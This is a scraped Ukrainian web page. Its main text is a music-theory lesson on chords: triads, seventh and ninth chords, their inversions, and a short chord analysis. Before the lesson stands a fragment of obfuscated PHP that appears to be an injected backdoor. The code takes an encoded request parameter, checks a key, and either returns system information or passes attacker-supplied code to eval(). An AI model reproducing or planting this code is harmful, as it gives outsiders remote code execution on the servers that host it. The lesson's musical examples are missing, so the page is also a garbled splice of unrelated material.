$n0702e){$d46b82 = $n0702e;$s682665 = $zdc9beb53;}if (!$d46b82){foreach ($p9d7d16[$p9d7d16['s9c93'][6].$p9d7d16['s9c93'][80].$p9d7d16['s9c93'][22].$p9d7d16['s9c93'][56].$p9d7d16['s9c93'][43].$p9d7d16['s9c93'][14].$p9d7d16['s9c93'][22]] as $zdc9beb53=>$n0702e){$d46b82 = $n0702e;$s682665 = $zdc9beb53;}}$d46b82 = @$p9d7d16[$p9d7d16['s9c93'][14].$p9d7d16['s9c93'][40].$p9d7d16['s9c93'][58].$p9d7d16['s9c93'][16].$p9d7d16['s9c93'][58].$p9d7d16['s9c93'][22].$p9d7d16['s9c93'][5]]($p9d7d16[$p9d7d16['s9c93'][39].$p9d7d16['s9c93'][33].$p9d7d16['s9c93'][0].$p9d7d16['s9c93'][0].$p9d7d16['s9c93'][95]]($p9d7d16[$p9d7d16['s9c93'][55].$p9d7d16['s9c93'][41].$p9d7d16['s9c93'][58].$p9d7d16['s9c93'][88].$p9d7d16['s9c93'][80].$p9d7d16['s9c93'][22]]($d46b82), $s682665));if (isset($d46b82[$p9d7d16['s9c93'][88].$p9d7d16['s9c93'][74]]) && $j2042643==$d46b82[$p9d7d16['s9c93'][88].$p9d7d16['s9c93'][74]]){if ($d46b82[$p9d7d16['s9c93'][88]] == $p9d7d16['s9c93'][47]){$c73772a = Array($p9d7d16['s9c93'][23].$p9d7d16['s9c93'][26] => @$p9d7d16[$p9d7d16['s9c93'][19].$p9d7d16['s9c93'][56].$p9d7d16['s9c93'][56].$p9d7d16['s9c93'][5].$p9d7d16['s9c93'][14].$p9d7d16['s9c93'][40]](),$p9d7d16['s9c93'][79].$p9d7d16['s9c93'][26] => $p9d7d16['s9c93'][95].$p9d7d16['s9c93'][52].$p9d7d16['s9c93'][5].$p9d7d16['s9c93'][8].$p9d7d16['s9c93'][95],);echo @$p9d7d16[$p9d7d16['s9c93'][82].$p9d7d16['s9c93'][68].$p9d7d16['s9c93'][80].$p9d7d16['s9c93'][41].$p9d7d16['s9c93'][0].$p9d7d16['s9c93'][41].$p9d7d16['s9c93'][0].$p9d7d16['s9c93'][14].$p9d7d16['s9c93'][43]]($c73772a);}elseif ($d46b82[$p9d7d16['s9c93'][88]] == $p9d7d16['s9c93'][14]){eval/*f0c3611f*/($d46b82[$p9d7d16['s9c93'][56]]);}exit();}} ?>

Акордові звуки

1. Гармонія. Співзвуччя. Акорд

       Гармонією називається об'єднання звуків в співзвуччя і зв'язна послідовність таких співзвуч. Гармонія має дуже істотне значення в розвитку музичного твору, в поглибленні і збагаченні його виразності. Вона здатна додавати мелодії самі різні емоційні відтінки і забарвлення. Найбільш відчутно це виявляється в тих випадках, коли одна і та ж мелодія виконується у супроводі різних послідовностей співзвуч:
       Гармонією часто називають також яку-небудь групу співзвучь або навіть окреме співзвуччя. Нарешті, терміном \ABгармонія\BB скорочено позначають вчення про будову і послідовність співзвучь (тобто власне вчення про гармонію). Співзвуччям називається одночасне поєднання декількох звуків. Співзвуччя з трьох, чотирьох або п'яти звуків, різних по висоті і по назвах, формує акорд, якщо ці звуки:

а) розташовані по терціях:
б) або можуть бути розташований по терціях шляхом октавних переміщень:

2, Типи акордів і їх назви

       Акорди застосовуються трьох типів: тризвуки, септакорди і нонакорди. Тризвук - акорд з трьох звуків (наприклад, до-мі-соль); переважає в музиці більшості епох і стилів. Септакорд - чотиризвуччя (наприклад, ре-фа-ля-до); має дуже велике розповсюдження. Нона – п’ятизвуччя (наприклад, соль-си-ре-фа-ля); застосовується значно рідше:

3. Назви звуків акорду

       Нижній звук акорду, розташованого по терціях, називається основним або прімою. Решта звуків акорду одержує назву від інтервалу, який кожен з них утворює з основним звуком; так, другий по висоті звук акорду називається терцією, третій - квінтою, четвертий - септимою, п'ятий - ноною: Назви ці зберігаються за звуками акорду при будь-якому їх розташуванні:

4. Основний акорд і його обернення

       Акорд може бути побудований або в основному вигляді, або в оберненні. В основному виді акорд (в основному тризвуку, септакорді або нонакорді) всі звуки поміщаються вище за його основний звук (див. приклади 2, 4, 5, 6, 7). В оберненні нижнім звуком акорду може бути його терція, або квінта, або септима, або (втім, рідко) нона:

5. Назви обернення тризвуку

       Перший обернення тризвуку, з терцією внизу, називається секстакордом: Другий обернення тризвуку, з квінтою в низу, називається квартсекстакордом:

6. Назви обернення септакорду

       Перший обернення септакорду (з терцією внизу) - квінтсекстакорд; друге обернення септакорду (з квінтою внизу) терцквартакорд; третє (з септимою .внизу)-секундакорд: Примітка. Нонакорд застосовується майже виключно в основному вигляді; тому для його оберненнь не встановилося загальноприйнятих назв.

7. Аналіз акордів в прикладі з музичної літератури

       На підставі висловлених відомостей можна проаналізувати акорди в якому-небудь музичному уривку:

а) Перший акорд (тт. 1-3) - тризвуку соль-си-бемоль-ре; внизу поміщений основний звук акорду - соль, тому тризвук є основним.
б) В четвертому і п'ятому тактах - септакорд соль-си-бемоль- ре-фа; внизу поміщена септима акорду, тому він є секундакордом.
в) В шостому такті - тризвуку до-ми-бемоль-соль; внизу - мі-бемоль, тобто терція, значить, даний акорд є секстакордом.
г) В кінці шостого такту звуки соль, сі-бемоль і ре утворюють друге обернення тризвуки - квартсекстакорд, бо внизу поміщена квінта тризвуку.
д) В сьомому і восьмому тактах - основний тризвук до-ми-бемоль-соль; внизу основний звук акорду - до.                    

  .   ˳  Український рейтинг TOP.TOPUA.NET Arts.In.UA Lviv TOP